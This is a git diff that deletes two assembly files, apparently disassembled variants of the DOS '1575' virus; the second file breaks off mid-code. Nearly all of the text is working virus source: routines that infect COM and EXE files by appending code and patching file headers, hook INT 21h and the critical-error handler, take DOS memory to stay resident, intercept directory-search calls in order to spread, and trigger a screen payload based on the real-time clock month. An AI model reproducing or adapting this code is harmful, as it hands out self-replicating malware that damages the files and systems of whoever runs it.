diff --git a/0-9/1575 (1).ASM b/0-9/1575 (1).ASM
deleted file mode 100755
index 7c94fa0..0000000
--- a/0-9/1575 (1).ASM
+++ /dev/null
@@ -1,947 +0,0 @@ - -PAGE 60,132 - -; -; -; VRES -; -; Created: 4-Jan-92 -; Passes: 5 Analysis Flags on: H -; -; - -data_1e equ 12Bh -data_2e equ 137h -data_3e equ 139h -data_4e equ 13Bh -data_5e equ 27Dh -data_6e equ 5CDh -data_7e equ 724h -data_8e equ 6B0h -data_9e equ 3 -data_10e equ 12h - -seg_a segment - assume cs:seg_a, ds:seg_a - - - org 100h - -vres proc far - -start: - push cs - mov ax,cs -data_11 dw 105h -data_12 dw 5000h -data_13 dw 0B8h -data_14 dw 5001h - db 0CBh, 0 -data_15 dw 0 -data_16 dw 0EB00h - db 4Ah, 90h -data_17 dw 1460h - db 74h, 2, 53h, 0FFh -data_18 dw 0F000h -data_19 dw 3B8h - db 0, 0CDh -data_20 dw 0CD10h -data_21 dw 20h -data_22 dw 20h -data_23 dw 11h -data_24 dw 0FFFFh -data_25 dw 4 -data_26 dw 100h -data_27 dw 674Fh -data_28 dw 100h -data_29 dw 4 -data_30 dw 0 -data_31 dw 0 -data_32 dw 0 -data_33 dw 340h -data_34 db 5 - db 0, 8Ah, 43h, 0B7h, 9Ah, 14h - db 0, 0, 1, 71h, 0Dh, 8Eh - db 0Ch, 56h, 5, 1, 0EAh, 56h - db 74h, 2, 5Ch, 7, 70h, 0 -loc_1: - push ss - add al,al - or bx,[si+7] - jo loc_2 ; Jump if overflow=1 -loc_2: - push es - push ds - mov ax,es - push cs - pop ds - push cs - pop es - mov data_31,ax - mov ax,ss - mov data_26,ax - mov al,2 - out 20h,al ; port 20h, 8259-1 int command - cld ; Clear direction - xor ax,ax ; Zero register - mov ds,ax - xor si,si ; Zero register - mov di,13Ch - mov cx,10h - repne movsb ; Rep while cx>0 Mov [si] to es:[di] - push ds - pop ss - mov bp,8 - xchg bp,sp - call sub_1 ; (01D5) - jmp loc_24 ; (0552) -loc_3: - call sub_12 ; (05EC) - call sub_2 ; (023D) - jz loc_4 ; Jump if zero - mov al,ds:data_7e - push ax - call sub_3 ; (02AE) - pop ax - mov ds:data_7e,al - jmp short loc_5 ; (01B4) - db 90h -loc_4: - call sub_5 ; (041B) - call sub_6 ; (043D) - cmp byte ptr ds:data_7e,0 - jne loc_5 ; Jump if not equal - mov ax,4C00h - int 21h ; DOS Services ah=function 4Ch - ; terminate with al=return code -loc_5: - cmp byte ptr ds:data_7e,43h ; 'C' - jne loc_8 ; Jump if not equal -loc_6: - pop ds - pop es - push 
cs - pop ds - pop es - push es - mov di,100h - mov si,10Bh - mov cx,0Ch - repne movsb ; Rep while cx>0 Mov [si] to es:[di] - push es - pop ds - mov ax,100h - push ax - xor ax,ax ; Zero register - retf ; Return far - -vres endp - -; -; SUBROUTINE -; - -sub_1 proc near - mov si,6 - lodsw ; String [si] to ax - cmp ax,192h - je loc_6 ; Jump if equal - cmp ax,179h - jne loc_7 ; Jump if not equal - jmp loc_10 ; (028F) -loc_7: - cmp ax,1DCh - je loc_8 ; Jump if equal - retn -loc_8: - pop ds - pop es - mov bx,cs:data_18 - sub bx,cs:data_29 - mov ax,cs - sub ax,bx - mov ss,ax - mov bp,cs:data_30 - xchg bp,sp - mov bx,cs:data_21 - sub bx,cs:data_22 - mov ax,cs - sub ax,bx - push ax - mov ax,cs:data_23 - push ax - retf ; Return far - db 23h, 1Ah - db '<#/--!.$' - db 0Eh, 23h, 2Fh, 2Dh, 0E0h - db 'D:VRES.COM' - db 0, 58h, 45h, 0, 0 - db 24h, 24h, 24h, 24h, 24h - -; External Entry into Subroutine - -sub_2: - mov ax,3D02h - mov dx,219h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_9 ; Jump if carry=0 - clc ; Clear carry flag - retn -loc_9: - mov ds:data_1e,ax - mov dx,673h - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,4202h - mov bx,ds:data_1e - mov cx,0FFFFh - mov dx,0FFFEh - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,27Dh - mov ah,3Fh ; '?' 
- mov bx,ds:data_1e - mov cx,2 - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - push ds - mov dx,ds:data_3e - mov ax,ds:data_2e - mov ds,ax - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ds - cmp word ptr ds:data_5e,0A0Ch - clc ; Clear carry flag - retn - db 0CDh, 20h -loc_10: - cmp ax,22Dh - je loc_11 ; Jump if equal - push ds - pop es - push cs - pop ds - mov ax,data_26 - mov ss,ax - xchg bp,sp - mov si,13Ch - mov di,0 - mov cx,10h - cld ; Clear direction - repne movsb ; Rep while cx>0 Mov [si] to es:[di] - jmp loc_3 ; (018C) -sub_1 endp - - -; -; SUBROUTINE -; - -sub_3 proc near -loc_11: - mov al,43h ; 'C' - mov ds:data_7e,al - mov al,8 - out 70h,al ; port 70h, RTC addr/enabl NMI - ; al = 8, month register - in al,71h ; port 71h, RTC clock/RAM data - mov ds:data_4e,al - mov dx,219h - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_12 ; Jump if carry=0 - retn -loc_12: - mov ds:data_1e,ax - mov dx,10Bh - mov bx,ds:data_1e - mov cx,0Ch - mov ah,3Fh ; '?' 
- int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - push ax - add ax,10h - and ax,0FFF0h - push ax - shr ax,1 ; Shift w/zeros fill - shr ax,1 ; Shift w/zeros fill - shr ax,1 ; Shift w/zeros fill - shr ax,1 ; Shift w/zeros fill - mov di,31Fh - stosw ; Store ax to es:[di] - pop ax - pop bx - sub ax,bx - mov cx,627h - add cx,ax - mov dx,100h - sub dx,ax - mov bx,ds:data_1e - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov ax,4200h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov ah,40h ; '@' - mov bx,ds:data_1e - mov cx,0Ch - mov dx,31Bh - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov ah,3Eh ; '>' - mov bx,ds:data_1e - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - retn -sub_3 endp - - db 0Eh, 8Ch, 0C8h, 5, 1, 0 - db 50h, 0B8h, 0, 1, 50h, 0CBh - -; -; SUBROUTINE -; - -sub_4 proc near - mov al,45h ; 'E' - mov byte ptr ds:[724h],al - mov al,8 - out 70h,al ; port 70h, RTC addr/enabl NMI - ; al = 8, month register - in al,71h ; port 71h, RTC clock/RAM data - mov data_34,al - mov dx,219h - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_13 ; Jump if carry=0 - retn -loc_13: - mov data_26,ax - mov dx,10Bh - mov bx,data_26 - mov cx,18h - mov ah,3Fh ; '?' 
- int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - mov ax,4202h - mov cx,0 - mov dx,0 - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - push ax - add ax,10h - adc dx,0 - and ax,0FFF0h - mov data_24,dx - mov data_25,ax - mov cx,727h - sub cx,100h - add ax,cx - adc dx,0 - mov cx,200h - div cx ; ax,dx rem=dx:ax/reg - inc ax - mov data_16,ax - mov data_15,dx - mov ax,data_21 - mov data_22,ax - mov ax,data_20 - mov data_23,ax - mov ax,data_18 - mov data_29,ax - mov ax,data_19 - mov data_30,ax - mov dx,data_24 - mov ax,data_25 - mov cx,10h - div cx ; ax,dx rem=dx:ax/reg - sub ax,10h - sub ax,data_17 - mov data_21,ax - mov data_18,ax - mov data_20,100h - mov data_19,100h - mov ax,4200h - xor cx,cx ; Zero register - mov dx,2 - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,10Dh - mov bx,data_26 - mov cx,16h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov dx,100h - mov ax,data_25 - pop cx - sub ax,cx - sub dx,ax - mov cx,727h - add cx,ax - sub cx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file cx=bytes, to ds:dx - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - retn -sub_4 endp - - db 51h, 0B9h, 0, 0, 0B4h, 4Eh - db 0CDh, 21h, 59h, 0C3h - -; -; SUBROUTINE -; - -sub_5 proc near - push es - mov ax,351Ch - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov cs:data_13,bx - mov cs:data_14,es - mov ax,3521h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - push es - pop ax - mov cs:data_12,ax - mov cs:data_11,bx - pop es - retn -sub_5 endp - - -; -; SUBROUTINE -; - -sub_6 proc near - push ax - push es - push ds - xor ax,ax ; Zero register - mov es,ax - mov si,86h - mov 
ax,es:[si] - mov ds,ax - mov si,725h - cmp word ptr [si],0A0Ch - jne loc_14 ; Jump if not equal - push ds - pop ax - call sub_13 ; (0611) - pop ds - pop es - pop ax - retn -loc_14: - push cs - pop ds - mov ax,data_31 - dec ax - mov es,ax - cmp byte ptr es:[0],5Ah ; 'Z' - je loc_15 ; Jump if equal - jmp short loc_16 ; (04B4) - db 90h -loc_15: - mov ax,es:data_9e - mov cx,737h - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - sub ax,cx - jc loc_16 ; Jump if carry Set - mov es:data_9e,ax - sub es:data_10e,cx - push cs - pop ds - mov ax,es:data_10e - push ax - pop es - mov si,100h - push si - pop di - mov cx,627h - cld ; Clear direction - repne movsb ; Rep while cx>0 Mov [si] to es:[di] - push es - sub ax,ax - mov es,ax - mov si,84h - mov dx,4A8h - mov es:[si],dx - inc si - inc si - pop ax - mov es:[si],ax -loc_16: - pop ds - pop es - pop ax - retn -sub_6 endp - - db 3Ch, 57h, 75h, 3, 0EBh, 1Eh - db 90h, 80h, 0FCh, 1Ah, 75h, 6 - db 0E8h, 17h, 1, 0EBh, 13h, 90h -loc_17: - cmp ah,11h - jne loc_18 ; Jump if not equal - call sub_7 ; (04E1) - iret ; Interrupt return -loc_18: - cmp ah,12h - jne loc_19 ; Jump if not equal - call sub_10 ; (059C) - iret ; Interrupt return -loc_19: - jmp dword ptr cs:data_11 - -; -; SUBROUTINE -; - -sub_7 proc near - mov al,57h ; 'W' - int 21h ; DOS Services ah=function 00h - ; terminate, cs=progm seg prefx - push ax - push cx - push dx - push bx - push bp - push si - push di - push ds - push es - push cs - pop ds - push cs - pop es - mov byte ptr cs:data_35,0 - nop - call sub_8 ; (0514) - jnz loc_20 ; Jump if not zero - call sub_2 ; (023D) - jz loc_20 ; Jump if zero - call sub_15 ; (065A) - dec byte ptr ds:data_6e -loc_20: - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - retn -sub_7 endp - - -; -; SUBROUTINE -; - -sub_8 proc near - push cs - pop es - push cs - pop es - cld ; Clear direction - call sub_9 ; (0552) - jnc loc_21 ; Jump 
if carry=0 - cmp di,0 - retn -loc_21: - mov di,219h - mov al,2Eh ; '.' - mov cx,0Bh - repne scasb ; Rept zf=0+cx>0 Scan es:[di] for al - cmp word ptr [di],4F43h - jne loc_22 ; Jump if not equal - cmp byte ptr [di+2],4Dh ; 'M' - jne loc_22 ; Jump if not equal - mov byte ptr ds:[724h],43h ; 'C' - nop - retn -loc_22: - cmp word ptr [di],5845h - jne loc_ret_23 ; Jump if not equal - cmp byte ptr [di+2],45h ; 'E' - jne loc_ret_23 ; Jump if not equal - mov byte ptr ds:[724h],45h ; 'E' - nop - -loc_ret_23: - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_9 proc near -loc_24: - push ds - mov si,cs:data_27 - mov ax,cs:data_28 - mov ds,ax - mov di,219h - lodsb ; String [si] to al - cmp al,0FFh - jne loc_25 ; Jump if not equal - add si,6 - lodsb ; String [si] to al - jmp short loc_26 ; (0574) - db 90h -loc_25: - cmp al,5 - jb loc_26 ; Jump if below - pop ds - stc ; Set carry flag - retn -loc_26: - mov cx,0Bh - cmp al,0 - je locloop_27 ; Jump if equal - add al,40h ; '@' - stosb ; Store al to es:[di] - mov al,3Ah ; ':' - stosb ; Store al to es:[di] - -locloop_27: - lodsb ; String [si] to al - cmp al,20h ; ' ' - je loc_28 ; Jump if equal - stosb ; Store al to es:[di] - jmp short loc_29 ; (0594) - db 90h -loc_28: - cmp byte ptr es:[di-1],2Eh ; '.' - je loc_29 ; Jump if equal - mov al,2Eh ; '.' 
- stosb ; Store al to es:[di] -loc_29: - loop locloop_27 ; Loop if cx > 0 - - mov al,0 - stosb ; Store al to es:[di] - pop ds - clc ; Clear carry flag - retn -sub_9 endp - - -; -; SUBROUTINE -; - -sub_10 proc near - mov al,57h ; 'W' - int 21h ; DOS Services ah=function 00h - ; terminate, cs=progm seg prefx - push ax - push cx - push dx - push bx - push bp - push si - push di - push ds - push es - push cs - pop ds - push cs - pop es - cmp byte ptr cs:data_35,0 - je loc_30 ; Jump if equal - jmp short loc_31 ; (05D3) - db 90h -loc_30: - call sub_8 ; (0514) - jnz loc_31 ; Jump if not zero - call sub_2 ; (023D) - jz loc_31 ; Jump if zero - call sub_15 ; (065A) - dec byte ptr ds:data_6e - pop es - pop ds - pop di - pop si -data_35 db 5Dh - db 5Bh, 5Ah, 59h, 58h, 0C3h -loc_31: - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - retn -sub_10 endp - - db 0 - -; -; SUBROUTINE -; - -sub_11 proc near - push ax - push ds - pop ax - mov cs:data_28,ax - mov cs:data_27,dx - pop ax - retn -sub_11 endp - - -; -; SUBROUTINE -; - -sub_12 proc near - push cs - mov al,0 - out 20h,al ; port 20h, 8259-1 int command - mov ax,3524h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov ds:data_3e,bx - mov bx,es - mov ds:data_2e,bx - pop es - mov si,20Ah - mov di,219h - mov cx,0Fh - -locloop_32: - lodsb ; String [si] to al - add al,20h ; ' ' - stosb ; Store al to es:[di] - loop locloop_32 ; Loop if cx > 0 - - retn -sub_12 endp - - -; -; SUBROUTINE -; - -sub_13 proc near - push ax - push cs - pop ds - push cs - pop es - mov bl,data_34 - cmp bl,0Ch - ja loc_34 ; Jump if above - cmp bl,0 - je loc_34 ; Jump if equal - mov al,8 - out 70h,al ; port 70h, RTC addr/enabl NMI - ; al = 8, month register - in al,71h ; port 71h, RTC clock/RAM data - cmp al,0Ch - ja loc_34 ; Jump if above - cmp al,0 - je loc_34 ; Jump if equal - cmp al,bl - je loc_34 ; Jump if equal - inc bl - call sub_14 ; (064F) - cmp al,bl - je loc_34 ; Jump if equal - inc bl - 
call sub_14 ; (064F) - cmp al,bl - je loc_34 ; Jump if equal - pop ds - call sub_16 ; (0686) - push cs - pop ds - retn - -; External Entry into Subroutine - -sub_14: - cmp bl,0Ch - jbe loc_ret_33 ; Jump if below or = - sub bl,0Ch - -loc_ret_33: - retn -loc_34: - pop ax - retn -sub_13 endp - - -; -; SUBROUTINE -; - -sub_15 proc near - mov dx,673h - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - cmp byte ptr ds:[724h],43h ; 'C' - jne loc_35 ; Jump if not equal - call sub_3 ; (02AE) - jmp short loc_36 ; (0672) - db 90h -loc_35: - call sub_4 ; (0337) -loc_36: - push ds -sub_15 endp - - -; -; -; External Entry Point -; -; - -int_24h_entry proc far - mov dx,data_33 - mov ax,data_32 - mov ds,ax - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ds - retn -int_24h_entry endp - - db 0B0h, 3, 0CFh - -; -; SUBROUTINE -; - -sub_16 proc near - mov dx,6B0h - mov ax,251Ch - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov byte ptr ds:data_8e,90h - nop - mov ax,0B800h - mov es,ax -data_36 db 0BFh -data_37 dw 0FA0h - db 0B8h, 20h, 7, 0B9h, 0Bh, 0 - db 0F2h, 0ABh, 0Eh, 7, 0C3h, 0 - db 0, 0, 20h, 7, 0Fh - db 0Ah -data_38 db 0Fh - db 0Ah -data_39 db 0Fh - db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh - db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0F7h - db 0Eh, 0EEh, 0Ch, 90h, 0FBh, 50h - db 51h, 52h, 53h, 55h, 56h, 57h - db 1Eh, 6, 0Eh, 1Fh, 0EBh, 0Bh - db 90h -loc_37: - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - iret ; Interrupt return -sub_16 endp - - db 0B8h, 0, 0B8h, 8Eh, 0C0h, 0E8h - db 2Bh, 0, 0BEh, 9Ah, 6, 0B9h - db 16h, 0, 0F2h, 0A4h, 80h, 3Eh - db 0AEh, 6, 0EEh, 74h, 8, 0C6h - db 6, 0AEh, 6, 0EEh, 0EBh, 6 - db 90h -loc_38: - mov data_38,0F0h -loc_39: - mov ax,es:[di] - mov ah,0Eh - mov data_37,ax - mov data_36,0 - jmp short loc_37 ; (06D0) - -; -; SUBROUTINE -; - -sub_17 proc near - mov di,0 -loc_40: - mov si,69Ch - push di - mov cx,12h - cld ; Clear 
direction - repe cmpsb ; Rept zf=1+cx>0 Cmp [si] to es:[di] - pop di - jz loc_41 ; Jump if zero - inc di - inc di - cmp di,0FA0h - jne loc_40 ; Jump if not equal - mov di,0 -loc_41: - cmp di,0F9Eh - jne loc_ret_42 ; Jump if not equal - mov data_39,0CFh - -loc_ret_42: - retn -sub_17 endp - - db 43h, 0Ch, 0Ah - -seg_a ends - - - - end start
diff --git a/0-9/1575-E (2).ASM b/0-9/1575-E (2).ASM
deleted file mode 100755
index 76d3a1f..0000000
--- a/0-9/1575-E (2).ASM
+++ /dev/null
@@ -1,983 +0,0 @@ - -PAGE 59,132 - -; -; -; 1575-E -; -; Created: 23-May-92 -; Passes: 5 Analysis Options on: none -; -; - -data_1e equ 6 -data_2e equ 84h -data_3e equ 86h -data_4e equ 100h -data_10e equ 31Fh -data_12e equ 0 ;* -data_13e equ 3 ;* -data_14e equ 12h ;* -data_15e equ 0 -data_55e equ 0FA0h -data_56e equ 6B0h -data_57e equ 725h - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -1575-e proc far - -start: - jmp short loc_4 - db 90h -data_17 dw 0B2Bh, 103Eh -data_19 dw 0FF53h -data_20 dw 0F000h -data_21 db 0B4h - db 2 -data_22 dw 2AB2h -data_23 dw 21CDh - db 0CDh, 20h -data_24 dw 0E5h - db 3Dh, 02h,0FFh,0FFh -data_25 dw 50Fh -data_26 dw 100h - db 26h,0D9h -data_27 dw 100h -data_28 dw 50Fh -data_29 dw 480h -data_30 dw 0 -data_31 dw 0 -data_32 dw 53F0h -data_33 dw 5 -data_34 dw 648Ch -data_35 dw 789Fh -data_36 dw 480h -data_37 dw 0BD1h -data_38 dw 1213h -data_39 dw 0EA2h -data_40 dw 5BFh -data_41 db 4Dh -data_42 db 31h - db 68h, 7Dh, 02h,0FBh, 07h - db 70h, 00h - -loc_ret_2: - retn - db 0E2h, 00h - db 0F0h,0FBh, 07h, 70h, 00h -loc_4: - push es - push ds - mov ax,es - push cs - pop ds - push cs - pop es - mov data_38,ax - mov ax,ss - mov data_33,ax - std ; Set direction flag - mov ax,7076h - cld ; Clear direction - xor ax,ax ; Zero register - mov ds,ax - xor si,si ; Zero register - mov di,offset data_42 - mov cx,10h - repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] - push ds - pop ss - mov bp,8 - xchg bp,sp - call sub_2 - jmp loc_27 -loc_5: - call sub_13 - call sub_3 - jz loc_6 ; Jump if zero - mov al,data_53 - push ax - call sub_4 - pop ax - mov data_53,al - jmp short loc_7 - db 90h -loc_6: - call sub_6 - call sub_7 - cmp byte ptr data_53,0 - jne loc_7 ; Jump if not equal - mov ax,4C00h - int 21h ; DOS Services ah=function 4Ch - ; terminate with al=return code -loc_7: - cmp byte ptr data_53,43h ; 'C' - jne loc_10 ; Jump if not equal -loc_8: - pop ds - pop es - push cs - pop ds - pop es - push es - mov di,data_4e - mov si,offset 
data_21 - mov cx,0Ch - repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] - push es - pop ds - mov ax,100h - push ax - xor ax,ax ; Zero register - retf ; Return far - -1575-e endp - -; -; SUBROUTINE -; - -sub_2 proc near - mov si,data_1e - lodsw ; String [si] to ax - cmp ax,192h - je loc_8 ; Jump if equal - cmp ax,179h - jne loc_9 ; Jump if not equal - jmp loc_12 -loc_9: - cmp ax,1DCh - je loc_10 ; Jump if equal - retn -loc_10: - pop ds - pop es - mov bx,cs:data_25 - sub bx,cs:data_36 - mov ax,cs - sub ax,bx - mov ss,ax - mov bp,cs:data_37 - xchg bp,sp - mov bx,cs:data_28 - sub bx,cs:data_29 - mov ax,cs - sub ax,bx - push ax - mov ax,cs:data_30 - push ax - retf ; Return far -data_43 db 23h - db 1Ah - db '<#/--!.$' - db 0Eh, 23h, 2Fh, 2Dh,0E0h -data_44 db 'A:MIO.COM', 0 - db 58h, 45h, 00h, 00h, 00h - db 24h, 24h, 24h, 24h, 24h - -; External Entry into Subroutine - -sub_3: - mov ax,3D02h - mov dx,offset data_44 ; ('A:MIO.COM') - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_11 ; Jump if carry=0 - clc ; Clear carry flag - retn -loc_11: - mov data_33,ax - mov dx,offset int_24h_entry - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov ax,4202h - mov bx,data_33 - mov cx,0FFFFh - mov dx,0FFFEh - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov dx,offset data_45 - mov ah,3Fh ; '?' 
- mov bx,data_33 - mov cx,2 - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - push ds - mov dx,data_40 - mov ax,data_39 - mov ds,ax - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ds - cmp data_45,0A0Ch - clc ; Clear carry flag - retn -data_45 dw 20CDh -loc_12: - cmp ax,22Dh - je loc_13 ; Jump if equal - push ds - pop es - push cs - pop ds - mov ax,data_33 - mov ss,ax - xchg bp,sp - mov si,offset data_42 - mov di,data_15e - mov cx,10h - cld ; Clear direction - repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] - jmp loc_5 -sub_2 endp - - -; -; SUBROUTINE -; - -sub_4 proc near -loc_13: - mov al,43h ; 'C' - mov data_53,al - mov al,8 - out 70h,al ; port 70h, RTC addr/enabl NMI - ; al = 8, month register - in al,71h ; port 71h, RTC clock/RAM data - mov data_41,al - mov dx,offset data_44 ; ('A:MIO.COM') - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_14 ; Jump if carry=0 - retn -loc_14: - mov data_33,ax - mov dx,offset data_21 - mov bx,data_33 - mov cx,0Ch - mov ah,3Fh ; '?' 
- int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - push ax - add ax,10h - and ax,0FFF0h - push ax - shr ax,1 ; Shift w/zeros fill - shr ax,1 ; Shift w/zeros fill - shr ax,1 ; Shift w/zeros fill - shr ax,1 ; Shift w/zeros fill - mov di,data_10e - stosw ; Store ax to es:[di] - pop ax - pop bx - sub ax,bx - mov cx,627h - add cx,ax - mov dx,100h - sub dx,ax - mov bx,data_33 - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - mov ax,4200h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov ah,40h ; '@' - mov bx,data_33 - mov cx,0Ch - mov dx,offset data_46 - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - mov ah,3Eh ; '>' - mov bx,data_33 - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - retn -sub_4 endp - -data_46 db 0Eh - db 8Ch,0C8h, 05h, 01h, 00h, 50h - db 0B8h, 00h, 01h, 50h,0CBh - -; -; SUBROUTINE -; - -sub_5 proc near - mov al,45h ; 'E' - mov data_53,al - mov al,8 - out 70h,al ; port 70h, RTC addr/enabl NMI - ; al = 8, month register - in al,71h ; port 71h, RTC clock/RAM data - mov data_41,al - mov dx,offset data_44 ; ('A:MIO.COM') - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - jnc loc_15 ; Jump if carry=0 - retn -loc_15: - mov data_33,ax - mov dx,offset data_21 - mov bx,data_33 - mov cx,18h - mov ah,3Fh ; '?' 
- int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - mov ax,4202h - mov cx,0 - mov dx,0 - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - push ax - add ax,10h - adc dx,0 - and ax,0FFF0h - mov data_31,dx - mov data_32,ax - mov cx,727h - sub cx,100h - add ax,cx - adc dx,0 - mov cx,200h - div cx ; ax,dx rem=dx:ax/reg - inc ax - mov data_23,ax - mov data_22,dx - mov ax,data_28 - mov data_29,ax - mov ax,data_27 - mov data_30,ax - mov ax,data_25 - mov data_36,ax - mov ax,data_26 - mov data_37,ax - mov dx,data_31 - mov ax,data_32 - mov cx,10h - div cx ; ax,dx rem=dx:ax/reg - sub ax,10h - sub ax,data_24 - mov data_28,ax - mov data_25,ax - mov data_27,100h - mov data_26,100h - mov ax,4200h - xor cx,cx ; Zero register - mov dx,2 - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov dx,offset data_22 - mov bx,data_33 - mov cx,16h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov dx,100h - mov ax,data_32 - pop cx - sub ax,cx - sub dx,ax - mov cx,727h - add cx,ax - sub cx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - retn -sub_5 endp - - push cx - mov cx,0 - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - pop cx - retn - -; -; SUBROUTINE -; - -sub_6 proc near - push es - mov ax,351Ch - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov cs:data_19,bx - mov cs:data_20,es - mov ax,3521h - int 21h ; DOS Services ah=function 35h - ; get 
intrpt vector al in es:bx - push es - pop ax - mov word ptr cs:data_17+2,ax - mov cs:data_17,bx - pop es - retn -sub_6 endp - - -; -; SUBROUTINE -; - -sub_7 proc near - push ax - push es - push ds - xor ax,ax ; Zero register - mov es,ax - mov si,data_3e - mov ax,es:[si] - mov ds,ax - mov si,data_57e - cmp word ptr [si],0A0Ch - jne loc_16 ; Jump if not equal - push ds - pop ax - call sub_14 - pop ds - pop es - pop ax - retn -loc_16: - push cs - pop ds - mov ax,data_38 - dec ax - mov es,ax - cmp byte ptr es:data_12e,5Ah ; 'Z' - nop ;*ASM fixup - sign extn byte - je loc_17 ; Jump if equal - jmp short loc_18 - db 90h -loc_17: - mov ax,es:data_13e - mov cx,737h - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - shr cx,1 ; Shift w/zeros fill - sub ax,cx - jc loc_18 ; Jump if carry Set - mov es:data_13e,ax - sub es:data_14e,cx - push cs - pop ds - mov ax,es:data_14e - push ax - pop es - mov si,100h - push si - pop di - mov cx,627h - cld ; Clear direction - repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] - push es - sub ax,ax - mov es,ax - mov si,data_2e - mov dx,4A8h - mov es:[si],dx - inc si - inc si - pop ax - mov es:[si],ax -loc_18: - pop ds - pop es - pop ax - retn -sub_7 endp - - cmp al,57h ; 'W' - jne loc_19 ; Jump if not equal - jmp short loc_22 - db 90h -loc_19: - cmp ah,1Ah - jne loc_20 ; Jump if not equal - call sub_12 